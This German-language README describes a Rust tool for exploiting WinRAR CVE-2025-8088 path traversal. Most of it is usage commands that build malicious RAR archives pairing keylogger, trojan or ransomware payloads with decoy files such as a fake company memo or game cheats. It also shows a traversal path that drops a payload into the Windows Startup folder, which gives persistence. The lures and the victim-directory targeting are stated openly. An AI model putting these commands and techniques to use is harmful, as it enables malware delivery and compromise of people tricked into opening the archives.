
Eine leistungsstarke, speichersichere Implementierung des WinRAR CVE-2025-8088 Exploit-Tools, umgeschrieben in Rust für bessere Zuverlässigkeit und Leistung.
Fortschrittliches WinRAR Path Traversal Exploit Tool – Geschrieben in Rust
Eine leistungsstarke, speichersichere Implementierung des WinRAR CVE-2025-8088 Exploit Tools, für bessere Zuverlässigkeit und Leistung in Rust neu geschrieben.
# Rust mit rustup installieren
# Installation überprüfen
rustc --version
cargo --version
# Mit vcpkg
vcpkg install gtk:x64-windows
pacman -S mingw-w64-x86_64-gtk4
# Ins Rust-Projektverzeichnis wechseln
cd winrar_exploit_rust
# Im Debug-Modus bauen
cargo build
# Optimierte Release-Version bauen
cargo build --release
# Anwendung ausführen
cargo run --release
Ein einfaches Exploit mit einer Payload- und einer Köderdatei erstellen:
# Exploit mit ausführbarer Payload erstellen
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"
# Exploit mit Skript-Payload erstellen
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"
# Mehrere, durch Kommas getrennte Köderdateien verwenden
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"
# Eigenes Verzeichnis angeben, in das die Payload abgelegt werden soll
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"
# Bild-Payload (Steganographie)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"
# PDF-Payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"
# Batch-Skript-Payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"
# Systemdiagnose ausführen, um Kompatibilität zu prüfen
.\winrar_exploit_rust.exe diagnose
# Verfügbare Tools und Funktionen anzeigen
.\winrar_exploit_rust.exe tools
# Ein bösartiges Dokument erstellen, das wie eine Firmennotiz aussieht
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"
# Schadsoftware in einer Spiel-Cheat-Datei verstecken
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"
Das Tool erstellt RAR-Archive mit Pfad-Traversal unter Verwendung von:
Pfadbeispiel: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
winrar_exploit_rust/
├── src/
│ ├── main.rs # Anwendungs-Einstiegspunkt
│ ├── gui.rs # GTK-basierte Benutzeroberfläche
│ ├── exploit.rs # Kern-Exploit-Logik
│ ├── ads.rs # NTFS-ADS-Manipulation
│ ├── rar.rs # RAR5-Header-Manipulation
│ ├── diagnostics.rs # Systemdiagnose
│ └── error.rs # Fehlerbehandlung
├── Cargo.toml # Abhängigkeiten und Build-Konfiguration
└── README.md # Diese Datei
Das Tool enthält eine automatische Diagnose, die Folgendes prüft:
„GTK nicht gefunden“
# GTK-Entwicklungsbibliotheken installieren
# Windows (vcpkg)
vcpkg install gtk:x64-windows
# Oder mit MSYS2
pacman -S mingw-w64-x86_64-gtk4
„WinRAR-CLI nicht gefunden“
rar.exe in Program Files befindet„Kann nicht in das Startup-Verzeichnis schreiben“
„NTFS-ADS nicht unterstützt“
Kompilierungsfehler
# Rust-Toolchain aktualisieren
rustup update
# Bereinigen und neu bauen
cargo clean
cargo build --release
# Code formatieren
cargo fmt
# Code linten
cargo clippy
Wichtige Abhängigkeiten umfassen:
gtk – Modernes GUI-Frameworktokio – Asynchrone Laufzeitwindows – Windows-API-Bindungencrc32fast – Schnelle CRC32-Berechnungbyteorder – Byte-Reihenfolge-Manipulationanyhow – FehlerbehandlungDieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
Erstellt von @kanonufo auf Telegram
Hochleistungs-Red-Team-Tool für die Ausnutzung von CVE-2025-8088 – Rust-Edition